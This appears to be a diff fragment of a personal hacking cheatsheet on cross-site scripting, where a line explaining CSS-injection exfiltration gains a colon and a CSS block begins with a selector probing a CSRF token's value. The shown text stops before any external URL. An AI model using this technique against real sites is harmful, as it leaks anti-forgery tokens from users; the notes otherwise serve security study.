0xb120/cheatsheets_and_ctf-notes/Dev, ICT & Cybersec/Web & Network Hacking/Cross-Site Scripting (XSS).md

 ## CSS injection and exfiltration

-The main technique to exfiltrate information via CSS Injection is to try to match a text with CSS and in case that text exist load some external resource
+The main technique to exfiltrate information via CSS Injection is to try to match a text with CSS and in case that text exist load some external resource:

 ```css
 input[name=csrf][value^=a]{